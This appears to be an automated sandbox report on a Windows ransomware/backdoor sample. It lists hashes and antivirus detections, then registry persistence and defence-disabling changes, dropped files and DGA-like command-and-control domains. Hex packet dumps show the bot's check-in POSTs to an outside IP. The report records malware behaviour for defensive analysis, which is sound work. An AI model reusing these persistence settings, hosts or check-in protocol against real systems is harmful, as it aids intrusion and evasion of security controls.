Analysis Date2014-12-21 00:58:59
MD53bf440af367165165ab702a3acf663f0
SHA148ce1469ce10594fe23b43abcc5606c111a7cbc2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 653a03e10cf0801ab25a383b5e7ac20e sha1: ce7e4b42cbfd1b6c3d1b413392570d4d6d8677e9 size: 167424
Section.rsrc md5: 79c9b1fb6dd3e03efbf888b7b10f4100 sha1: 718851b48b832057242c8be5d4b58c1c23bd9ba4 size: 16896
Timestamp1992-06-19 22:22:17
PackerNetopsystems FEAD Optimizer
PEhash9274948af84aea380359f0aaf1c8ec18e6086bf2
IMPhashda398a0ee3e0c5fe86150c8435bc6700
AV360 SafeGen:Variant.Graftor.119267
AVAd-AwareGen:Variant.Graftor.119267
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Gen:Variant.Graftor.119267
AVAuthentiumW32/Trojan.UIRY-5921
AVAvira (antivir)DR/Delphi.Gen8
AVBullGuardGen:Variant.Graftor.119267
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Graftor.119267
AVEset (nod32)Win32/Injector.AOQH
AVFortinetW32/Injector.ABS!tr
AVFrisk (f-prot)W32/Trojan2.OBMD
AVF-SecureGen:Variant.Graftor.119267
AVGrisoft (avg)SHeur4.BQYI
AVIkarusTrojan.Win32.Dircrypt
AVK7Trojan ( 0048dc991 )
AVKasperskyBackdoor.Win32.Androm.ayhk
AVMalwareBytesno_virus
AVMcafeeRDN/Pinkslipbot.as!c
AVMicrosoft Security EssentialsRansom:Win32/Dircrypt
AVMicroWorld (escan)Gen:Variant.Graftor.119267
AVRisingno_virus
AVSophosTroj/Ransom-ADA
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)Heur.Trojan.Hlux

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit ➝
C:\WINDOWS\system32\userinit.exe,,C:\Program Files\WindowsUpdate\alKiplfd.exe\\x00
RegistryHKEY_CURRENT_USER\Software\{C470506E-351B-A6B5-175E-88EAF1697495}\ID ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\vRFzPYeh ➝
C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\wsRepWRd.exe\\x00
RegistryHKEY_LOCAL_MACHINE\Software\{C470506E-351B-A6B5-175E-88EAF1697495}\ID ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride ➝
1
Creates File\\?\C:\Program Files\WindowsUpdate\alKiplfd.exe
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\nKIQhtGz.exe
Creates File\\?\C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\wsRepWRd.exe
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\JsYNPocY.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\9b021f678de09461b4595f16c744242c_666939c9-243b-475e-9504-51724db22670
Creates FilePIPE\samr
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\JsYNPocY.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\JsYNPocY.exe
Creates MutexGlobal\{E24B0061-53D6-C470-351B-A6B5A16B088A}
Winsock DNSiqpmhfrvgp.com
Winsock DNSbucelslmpwyajzlguis.com
Winsock DNScamwzffgqhckviufup.com
Winsock DNSvpicphumwodnoatp.com
Winsock DNSlcqivpov.com
Winsock DNSjulpwwtnv.com
Winsock DNSnkgnacybwam.com
Winsock DNStwnojbfrsryuuhsxv.com
Winsock DNSorsgyfcpthjvdxrvcu.com
Winsock DNSaummdgqbto.com
Winsock DNSjxuynwdac.com
Winsock DNServqveknzq.com
Winsock DNSgtrcacxkcf.com
Winsock DNSlkasukqlhhffimy.com
Winsock DNS31.207.6.189
Winsock DNScsmofrotzrce.com
Winsock DNSeyorinrbjfxuy.com
Winsock DNScbhytcvyxzzj.com
Winsock DNSzhszoxeavbhmtkbju.com
Winsock DNSpqgjtqais.com
Winsock DNSgpaiuaasntnqycyhr.com
Winsock DNShuaezwesrmxigyqj.com
Winsock DNSywcimnoycx.com
Winsock DNSmghjssbleagjvpqnfccr.com
Winsock DNSpchjwpiyd.com
Winsock DNSdsxxmzwgbfeaw.com
Winsock DNSonnxtepjtmtukenpm.com
Winsock DNSlntnrzgkyswawkuz.com
Winsock DNScxslixugarbv.com
Winsock DNSjgsmhiqpocc.com
Winsock DNSlbmntrwvfzwp.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\JsYNPocY.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\JsYNPocY.exe

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\JsYNPocY.exe

Network Details:

DNScbhytcvyxzzj.com
Type: A
216.8.179.23
DNServqveknzq.com
Type: A
216.8.179.23
DNSbucelslmpwyajzlguis.com
Type: A
107.20.253.26
DNSjxuynwdac.com
Type: A
DNSzhszoxeavbhmtkbju.com
Type: A
DNSnkgnacybwam.com
Type: A
DNSaummdgqbto.com
Type: A
DNSpqgjtqais.com
Type: A
DNSywcimnoycx.com
Type: A
DNSorsgyfcpthjvdxrvcu.com
Type: A
DNSvpicphumwodnoatp.com
Type: A
DNSlcqivpov.com
Type: A
DNSjulpwwtnv.com
Type: A
DNSiqpmhfrvgp.com
Type: A
DNSgpaiuaasntnqycyhr.com
Type: A
DNScxslixugarbv.com
Type: A
DNSlbmntrwvfzwp.com
Type: A
DNSonnxtepjtmtukenpm.com
Type: A
DNScsmofrotzrce.com
Type: A
DNSdsxxmzwgbfeaw.com
Type: A
DNSlkasukqlhhffimy.com
Type: A
DNSpchjwpiyd.com
Type: A
DNSgtrcacxkcf.com
Type: A
DNSmghjssbleagjvpqnfccr.com
Type: A
DNSeyorinrbjfxuy.com
Type: A
DNSlntnrzgkyswawkuz.com
Type: A
DNScamwzffgqhckviufup.com
Type: A
DNSjgsmhiqpocc.com
Type: A
DNStwnojbfrsryuuhsxv.com
Type: A
DNShuaezwesrmxigyqj.com
Type: A
HTTP POSThttp://31.207.6.189/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://cbhytcvyxzzj.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://ervqveknzq.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://bucelslmpwyajzlguis.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://31.207.6.189/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://31.207.6.189/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://cbhytcvyxzzj.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://ervqveknzq.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://bucelslmpwyajzlguis.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
HTTP POSThttp://31.207.6.189/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
Flows TCP192.168.1.1:1032 ➝ 31.207.6.189:80
Flows TCP192.168.1.1:1032 ➝ 31.207.6.189:80
Flows TCP192.168.1.1:1041 ➝ 216.8.179.23:80
Flows TCP192.168.1.1:1042 ➝ 216.8.179.23:80
Flows TCP192.168.1.1:1043 ➝ 107.20.253.26:80
Flows TCP192.168.1.1:1044 ➝ 31.207.6.189:80
Flows TCP192.168.1.1:1045 ➝ 31.207.6.189:80
Flows TCP192.168.1.1:1046 ➝ 216.8.179.23:80
Flows TCP192.168.1.1:1047 ➝ 216.8.179.23:80
Flows TCP192.168.1.1:1048 ➝ 107.20.253.26:80
Flows TCP192.168.1.1:1049 ➝ 31.207.6.189:80

Raw Pcap
0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2033 312e3230 372e362e   .Host: 31.207.6.
0x00000020 (00032)   3138390d 0a557365 722d4167 656e743a   189..User-Agent:
0x00000030 (00048)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000040 (00064)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x00000050 (00080)   2e303b20 2e4e4554 342e3045 3b204d65   .0; .NET4.0E; Me
0x00000060 (00096)   64696120 43656e74 65722050 4320362e   dia Center PC 6.
0x00000070 (00112)   303b204d 41534529 0d0a436f 6e74656e   0; MASE)..Conten
0x00000080 (00128)   742d5479 70653a20 6d756c74 69706172   t-Type: multipar
0x00000090 (00144)   742f666f 726d2d64 6174613b 20626f75   t/form-data; bou
0x000000a0 (00160)   6e646172 793d7663 56464944 7a477957   ndary=vcVFIDzGyW
0x000000b0 (00176)   69534d72 64494851 46550d0a 436f6e74   iSMrdIHQFU..Cont
0x000000c0 (00192)   656e742d 4c656e67 74683a20 3130300d   ent-Length: 100.
0x000000d0 (00208)   0a416363 6570742d 4c616e67 75616765   .Accept-Language
0x000000e0 (00224)   3a20656e 2d75730d 0a416363 6570743a   : en-us..Accept:
0x000000f0 (00240)   20746578 742f6874 6d6c2c20 6170706c    text/html, appl
0x00000100 (00256)   69636174 696f6e2f 786d6c3b 713d302e   ication/xml;q=0.
0x00000110 (00272)   392c2061 70706c69 63617469 6f6e2f78   9, application/x
0x00000120 (00288)   68746d6c 2b786d6c 3b713d30 2e392c20   html+xml;q=0.9, 
0x00000130 (00304)   696d6167 652f706e 672c2069 6d616765   image/png, image
0x00000140 (00320)   2f6a7065 672c2069 6d616765 2f676966   /jpeg, image/gif
0x00000150 (00336)   2c20696d 6167652f 782d7862 69746d61   , image/x-xbitma
0x00000160 (00352)   702c202a 5c2a3b71 3d302e31 0d0a4163   p, *\*;q=0.1..Ac
0x00000170 (00368)   63657074 2d436861 72736574 3a207574   cept-Charset: ut
0x00000180 (00384)   662d382c 20757466 2d31363b 713d302e   f-8, utf-16;q=0.
0x00000190 (00400)   362c202a 3b713d30 2e310d0a 50726167   6, *;q=0.1..Prag
0x000001a0 (00416)   6d613a20 6e6f2d63 61636865 0d0a436f   ma: no-cache..Co
0x000001b0 (00432)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001c0 (00448)   0a0d0a2d 2d766356 4649447a 47795769   ...--vcVFIDzGyWi
0x000001d0 (00464)   534d7264 49485146 550d0a43 6f6e7465   SMrdIHQFU..Conte
0x000001e0 (00480)   6e742d44 6973706f 73697469 6f6e3a20   nt-Disposition: 
0x000001f0 (00496)   666f726d 2d646174 613b206e 616d653d   form-data; name=
0x00000200 (00512)   22636d64 220d0a0d 0a63720d 0a2d2d76   "cmd"....cr..--v
0x00000210 (00528)   63564649 447a4779 5769534d 72644948   cVFIDzGyWiSMrdIH
0x00000220 (00544)   5146552d 2d0d0a                       QFU--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2063 62687974 63767978   .Host: cbhytcvyx
0x00000020 (00032)   7a7a6a2e 636f6d0d 0a557365 722d4167   zzj.com..User-Ag
0x00000030 (00048)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000040 (00064)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000050 (00080)   49452037 2e303b20 2e4e4554 342e3045   IE 7.0; .NET4.0E
0x00000060 (00096)   3b204d65 64696120 43656e74 65722050   ; Media Center P
0x00000070 (00112)   4320362e 303b204d 41534529 0d0a436f   C 6.0; MASE)..Co
0x00000080 (00128)   6e74656e 742d5479 70653a20 6d756c74   ntent-Type: mult
0x00000090 (00144)   69706172 742f666f 726d2d64 6174613b   ipart/form-data;
0x000000a0 (00160)   20626f75 6e646172 793d5343 4c456f52    boundary=SCLEoR
0x000000b0 (00176)   5166414a 57647471 7641536a 43460d0a   QfAJWdtqvASjCF..
0x000000c0 (00192)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000d0 (00208)   3130300d 0a416363 6570742d 4c616e67   100..Accept-Lang
0x000000e0 (00224)   75616765 3a20656e 2d75730d 0a416363   uage: en-us..Acc
0x000000f0 (00240)   6570743a 20746578 742f6874 6d6c2c20   ept: text/html, 
0x00000100 (00256)   6170706c 69636174 696f6e2f 786d6c3b   application/xml;
0x00000110 (00272)   713d302e 392c2061 70706c69 63617469   q=0.9, applicati
0x00000120 (00288)   6f6e2f78 68746d6c 2b786d6c 3b713d30   on/xhtml+xml;q=0
0x00000130 (00304)   2e392c20 696d6167 652f706e 672c2069   .9, image/png, i
0x00000140 (00320)   6d616765 2f6a7065 672c2069 6d616765   mage/jpeg, image
0x00000150 (00336)   2f676966 2c20696d 6167652f 782d7862   /gif, image/x-xb
0x00000160 (00352)   69746d61 702c202a 5c2a3b71 3d302e31   itmap, *\*;q=0.1
0x00000170 (00368)   0d0a4163 63657074 2d436861 72736574   ..Accept-Charset
0x00000180 (00384)   3a207574 662d382c 20757466 2d31363b   : utf-8, utf-16;
0x00000190 (00400)   713d302e 362c202a 3b713d30 2e310d0a   q=0.6, *;q=0.1..
0x000001a0 (00416)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000001b0 (00432)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001c0 (00448)   6f73650d 0a0d0a2d 2d53434c 456f5251   ose....--SCLEoRQ
0x000001d0 (00464)   66414a57 64747176 41536a43 460d0a43   fAJWdtqvASjCF..C
0x000001e0 (00480)   6f6e7465 6e742d44 6973706f 73697469   ontent-Dispositi
0x000001f0 (00496)   6f6e3a20 666f726d 2d646174 613b206e   on: form-data; n
0x00000200 (00512)   616d653d 22636d64 220d0a0d 0a63720d   ame="cmd"....cr.
0x00000210 (00528)   0a2d2d53 434c456f 52516641 4a576474   .--SCLEoRQfAJWdt
0x00000220 (00544)   71764153 6a43462d 2d0d0a              qvASjCF--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2065 72767176 656b6e7a   .Host: ervqveknz
0x00000020 (00032)   712e636f 6d0d0a55 7365722d 4167656e   q.com..User-Agen
0x00000030 (00048)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000040 (00064)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000050 (00080)   20372e30 3b202e4e 4554342e 30453b20    7.0; .NET4.0E; 
0x00000060 (00096)   4d656469 61204365 6e746572 20504320   Media Center PC 
0x00000070 (00112)   362e303b 204d4153 45290d0a 436f6e74   6.0; MASE)..Cont
0x00000080 (00128)   656e742d 54797065 3a206d75 6c746970   ent-Type: multip
0x00000090 (00144)   6172742f 666f726d 2d646174 613b2062   art/form-data; b
0x000000a0 (00160)   6f756e64 6172793d 6d555844 68716a56   oundary=mUXDhqjV
0x000000b0 (00176)   675a5274 4d435556 49417841 0d0a436f   gZRtMCUVIAxA..Co
0x000000c0 (00192)   6e74656e 742d4c65 6e677468 3a203130   ntent-Length: 10
0x000000d0 (00208)   300d0a41 63636570 742d4c61 6e677561   0..Accept-Langua
0x000000e0 (00224)   67653a20 656e2d75 730d0a41 63636570   ge: en-us..Accep
0x000000f0 (00240)   743a2074 6578742f 68746d6c 2c206170   t: text/html, ap
0x00000100 (00256)   706c6963 6174696f 6e2f786d 6c3b713d   plication/xml;q=
0x00000110 (00272)   302e392c 20617070 6c696361 74696f6e   0.9, application
0x00000120 (00288)   2f786874 6d6c2b78 6d6c3b71 3d302e39   /xhtml+xml;q=0.9
0x00000130 (00304)   2c20696d 6167652f 706e672c 20696d61   , image/png, ima
0x00000140 (00320)   67652f6a 7065672c 20696d61 67652f67   ge/jpeg, image/g
0x00000150 (00336)   69662c20 696d6167 652f782d 78626974   if, image/x-xbit
0x00000160 (00352)   6d61702c 202a5c2a 3b713d30 2e310d0a   map, *\*;q=0.1..
0x00000170 (00368)   41636365 70742d43 68617273 65743a20   Accept-Charset: 
0x00000180 (00384)   7574662d 382c2075 74662d31 363b713d   utf-8, utf-16;q=
0x00000190 (00400)   302e362c 202a3b71 3d302e31 0d0a5072   0.6, *;q=0.1..Pr
0x000001a0 (00416)   61676d61 3a206e6f 2d636163 68650d0a   agma: no-cache..
0x000001b0 (00432)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001c0 (00448)   650d0a0d 0a2d2d6d 55584468 716a5667   e....--mUXDhqjVg
0x000001d0 (00464)   5a52744d 43555649 4178410d 0a436f6e   ZRtMCUVIAxA..Con
0x000001e0 (00480)   74656e74 2d446973 706f7369 74696f6e   tent-Disposition
0x000001f0 (00496)   3a20666f 726d2d64 6174613b 206e616d   : form-data; nam
0x00000200 (00512)   653d2263 6d64220d 0a0d0a63 720d0a2d   e="cmd"....cr..-
0x00000210 (00528)   2d6d5558 4468716a 56675a52 744d4355   -mUXDhqjVgZRtMCU
0x00000220 (00544)   56494178 412d2d0d 0a                  VIAxA--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2062 7563656c 736c6d70   .Host: bucelslmp
0x00000020 (00032)   7779616a 7a6c6775 69732e63 6f6d0d0a   wyajzlguis.com..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520372e 303b202e   ble; MSIE 7.0; .
0x00000060 (00096)   4e455434 2e30453b 204d6564 69612043   NET4.0E; Media C
0x00000070 (00112)   656e7465 72205043 20362e30 3b204d41   enter PC 6.0; MA
0x00000080 (00128)   5345290d 0a436f6e 74656e74 2d547970   SE)..Content-Typ
0x00000090 (00144)   653a206d 756c7469 70617274 2f666f72   e: multipart/for
0x000000a0 (00160)   6d2d6461 74613b20 626f756e 64617279   m-data; boundary
0x000000b0 (00176)   3d765642 736d6370 534b6c65 6b6a7559   =vVBsmcpSKlekjuY
0x000000c0 (00192)   5558584c 540d0a43 6f6e7465 6e742d4c   UXXLT..Content-L
0x000000d0 (00208)   656e6774 683a2031 30300d0a 41636365   ength: 100..Acce
0x000000e0 (00224)   70742d4c 616e6775 6167653a 20656e2d   pt-Language: en-
0x000000f0 (00240)   75730d0a 41636365 70743a20 74657874   us..Accept: text
0x00000100 (00256)   2f68746d 6c2c2061 70706c69 63617469   /html, applicati
0x00000110 (00272)   6f6e2f78 6d6c3b71 3d302e39 2c206170   on/xml;q=0.9, ap
0x00000120 (00288)   706c6963 6174696f 6e2f7868 746d6c2b   plication/xhtml+
0x00000130 (00304)   786d6c3b 713d302e 392c2069 6d616765   xml;q=0.9, image
0x00000140 (00320)   2f706e67 2c20696d 6167652f 6a706567   /png, image/jpeg
0x00000150 (00336)   2c20696d 6167652f 6769662c 20696d61   , image/gif, ima
0x00000160 (00352)   67652f78 2d786269 746d6170 2c202a5c   ge/x-xbitmap, *\
0x00000170 (00368)   2a3b713d 302e310d 0a416363 6570742d   *;q=0.1..Accept-
0x00000180 (00384)   43686172 7365743a 20757466 2d382c20   Charset: utf-8, 
0x00000190 (00400)   7574662d 31363b71 3d302e36 2c202a3b   utf-16;q=0.6, *;
0x000001a0 (00416)   713d302e 310d0a50 7261676d 613a206e   q=0.1..Pragma: n
0x000001b0 (00432)   6f2d6361 6368650d 0a436f6e 6e656374   o-cache..Connect
0x000001c0 (00448)   696f6e3a 20636c6f 73650d0a 0d0a2d2d   ion: close....--
0x000001d0 (00464)   76564273 6d637053 4b6c656b 6a755955   vVBsmcpSKlekjuYU
0x000001e0 (00480)   58584c54 0d0a436f 6e74656e 742d4469   XXLT..Content-Di
0x000001f0 (00496)   73706f73 6974696f 6e3a2066 6f726d2d   sposition: form-
0x00000200 (00512)   64617461 3b206e61 6d653d22 636d6422   data; name="cmd"
0x00000210 (00528)   0d0a0d0a 63720d0a 2d2d7656 42736d63   ....cr..--vVBsmc
0x00000220 (00544)   70534b6c 656b6a75 59555858 4c542d2d   pSKlekjuYUXXLT--
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2033 312e3230 372e362e   .Host: 31.207.6.
0x00000020 (00032)   3138390d 0a557365 722d4167 656e743a   189..User-Agent:
0x00000030 (00048)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000040 (00064)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x00000050 (00080)   2e303b20 2e4e4554 342e3045 3b204d65   .0; .NET4.0E; Me
0x00000060 (00096)   64696120 43656e74 65722050 4320362e   dia Center PC 6.
0x00000070 (00112)   303b204d 41534529 0d0a436f 6e74656e   0; MASE)..Conten
0x00000080 (00128)   742d5479 70653a20 6d756c74 69706172   t-Type: multipar
0x00000090 (00144)   742f666f 726d2d64 6174613b 20626f75   t/form-data; bou
0x000000a0 (00160)   6e646172 793d4a6e 51705365 6c717876   ndary=JnQpSelqxv
0x000000b0 (00176)   63694856 6e754377 674f0d0a 436f6e74   ciHVnuCwgO..Cont
0x000000c0 (00192)   656e742d 4c656e67 74683a20 3236300d   ent-Length: 260.
0x000000d0 (00208)   0a416363 6570742d 4c616e67 75616765   .Accept-Language
0x000000e0 (00224)   3a20656e 2d75730d 0a416363 6570743a   : en-us..Accept:
0x000000f0 (00240)   20746578 742f6874 6d6c2c20 6170706c    text/html, appl
0x00000100 (00256)   69636174 696f6e2f 786d6c3b 713d302e   ication/xml;q=0.
0x00000110 (00272)   392c2061 70706c69 63617469 6f6e2f78   9, application/x
0x00000120 (00288)   68746d6c 2b786d6c 3b713d30 2e392c20   html+xml;q=0.9, 
0x00000130 (00304)   696d6167 652f706e 672c2069 6d616765   image/png, image
0x00000140 (00320)   2f6a7065 672c2069 6d616765 2f676966   /jpeg, image/gif
0x00000150 (00336)   2c20696d 6167652f 782d7862 69746d61   , image/x-xbitma
0x00000160 (00352)   702c202a 5c2a3b71 3d302e31 0d0a4163   p, *\*;q=0.1..Ac
0x00000170 (00368)   63657074 2d436861 72736574 3a207574   cept-Charset: ut
0x00000180 (00384)   662d382c 20757466 2d31363b 713d302e   f-8, utf-16;q=0.
0x00000190 (00400)   362c202a 3b713d30 2e310d0a 50726167   6, *;q=0.1..Prag
0x000001a0 (00416)   6d613a20 6e6f2d63 61636865 0d0a436f   ma: no-cache..Co
0x000001b0 (00432)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001c0 (00448)   0a0d0a2d 2d4a6e51 7053656c 71787663   ...--JnQpSelqxvc
0x000001d0 (00464)   6948566e 75437767 4f0d0a43 6f6e7465   iHVnuCwgO..Conte
0x000001e0 (00480)   6e742d44 6973706f 73697469 6f6e3a20   nt-Disposition: 
0x000001f0 (00496)   666f726d 2d646174 613b206e 616d653d   form-data; name=
0x00000200 (00512)   22636d64 220d0a0d 0a6c640d 0a2d2d4a   "cmd"....ld..--J
0x00000210 (00528)   6e517053 656c7178 76636948 566e7543   nQpSelqxvciHVnuC
0x00000220 (00544)   77674f0d 0a436f6e 74656e74 2d446973   wgO..Content-Dis
0x00000230 (00560)   706f7369 74696f6e 3a20666f 726d2d64   position: form-d
0x00000240 (00576)   6174613b 206e616d 653d2262 6f746964   ata; name="botid
0x00000250 (00592)   220d0a0d 0a433035 39393030 41313239   "....C059900A129
0x00000260 (00608)   34440d0a 2d2d4a6e 51705365 6c717876   4D..--JnQpSelqxv
0x00000270 (00624)   63694856 6e754377 674f0d0a 436f6e74   ciHVnuCwgO..Cont
0x00000280 (00640)   656e742d 44697370 6f736974 696f6e3a   ent-Disposition:
0x00000290 (00656)   20666f72 6d2d6461 74613b20 6e616d65    form-data; name
0x000002a0 (00672)   3d226c69 64220d0a 0d0a300d 0a2d2d4a   ="lid"....0..--J
0x000002b0 (00688)   6e517053 656c7178 76636948 566e7543   nQpSelqxvciHVnuC
0x000002c0 (00704)   77674f2d 2d0d0a                       wgO--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2033 312e3230 372e362e   .Host: 31.207.6.
0x00000020 (00032)   3138390d 0a557365 722d4167 656e743a   189..User-Agent:
0x00000030 (00048)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000040 (00064)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x00000050 (00080)   2e303b20 2e4e4554 342e3045 3b204d65   .0; .NET4.0E; Me
0x00000060 (00096)   64696120 43656e74 65722050 4320362e   dia Center PC 6.
0x00000070 (00112)   303b204d 41534529 0d0a436f 6e74656e   0; MASE)..Conten
0x00000080 (00128)   742d5479 70653a20 6d756c74 69706172   t-Type: multipar
0x00000090 (00144)   742f666f 726d2d64 6174613b 20626f75   t/form-data; bou
0x000000a0 (00160)   6e646172 793d6949 62666446 7a566e4f   ndary=iIbfdFzVnO
0x000000b0 (00176)   42676844 50725554 54660d0a 436f6e74   BghDPrUTTf..Cont
0x000000c0 (00192)   656e742d 4c656e67 74683a20 3130300d   ent-Length: 100.
0x000000d0 (00208)   0a416363 6570742d 4c616e67 75616765   .Accept-Language
0x000000e0 (00224)   3a20656e 2d75730d 0a416363 6570743a   : en-us..Accept:
0x000000f0 (00240)   20746578 742f6874 6d6c2c20 6170706c    text/html, appl
0x00000100 (00256)   69636174 696f6e2f 786d6c3b 713d302e   ication/xml;q=0.
0x00000110 (00272)   392c2061 70706c69 63617469 6f6e2f78   9, application/x
0x00000120 (00288)   68746d6c 2b786d6c 3b713d30 2e392c20   html+xml;q=0.9, 
0x00000130 (00304)   696d6167 652f706e 672c2069 6d616765   image/png, image
0x00000140 (00320)   2f6a7065 672c2069 6d616765 2f676966   /jpeg, image/gif
0x00000150 (00336)   2c20696d 6167652f 782d7862 69746d61   , image/x-xbitma
0x00000160 (00352)   702c202a 5c2a3b71 3d302e31 0d0a4163   p, *\*;q=0.1..Ac
0x00000170 (00368)   63657074 2d436861 72736574 3a207574   cept-Charset: ut
0x00000180 (00384)   662d382c 20757466 2d31363b 713d302e   f-8, utf-16;q=0.
0x00000190 (00400)   362c202a 3b713d30 2e310d0a 50726167   6, *;q=0.1..Prag
0x000001a0 (00416)   6d613a20 6e6f2d63 61636865 0d0a436f   ma: no-cache..Co
0x000001b0 (00432)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001c0 (00448)   0a0d0a2d 2d694962 6664467a 566e4f42   ...--iIbfdFzVnOB
0x000001d0 (00464)   67684450 72555454 660d0a43 6f6e7465   ghDPrUTTf..Conte
0x000001e0 (00480)   6e742d44 6973706f 73697469 6f6e3a20   nt-Disposition: 
0x000001f0 (00496)   666f726d 2d646174 613b206e 616d653d   form-data; name=
0x00000200 (00512)   22636d64 220d0a0d 0a63720d 0a2d2d69   "cmd"....cr..--i
0x00000210 (00528)   49626664 467a566e 4f426768 44507255   IbfdFzVnOBghDPrU
0x00000220 (00544)   5454662d 2d0d0a6e 74656e74 2d446973   TTf--..ntent-Dis
0x00000230 (00560)   706f7369 74696f6e 3a20666f 726d2d64   position: form-d
0x00000240 (00576)   6174613b 206e616d 653d2262 6f746964   ata; name="botid
0x00000250 (00592)   220d0a0d 0a433035 39393030 41313239   "....C059900A129
0x00000260 (00608)   34440d0a 2d2d4a6e 51705365 6c717876   4D..--JnQpSelqxv
0x00000270 (00624)   63694856 6e754377 674f0d0a 436f6e74   ciHVnuCwgO..Cont
0x00000280 (00640)   656e742d 44697370 6f736974 696f6e3a   ent-Disposition:
0x00000290 (00656)   20666f72 6d2d6461 74613b20 6e616d65    form-data; name
0x000002a0 (00672)   3d226c69 64220d0a 0d0a300d 0a2d2d4a   ="lid"....0..--J
0x000002b0 (00688)   6e517053 656c7178 76636948 566e7543   nQpSelqxvciHVnuC
0x000002c0 (00704)   77674f2d 2d0d0a                       wgO--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2063 62687974 63767978   .Host: cbhytcvyx
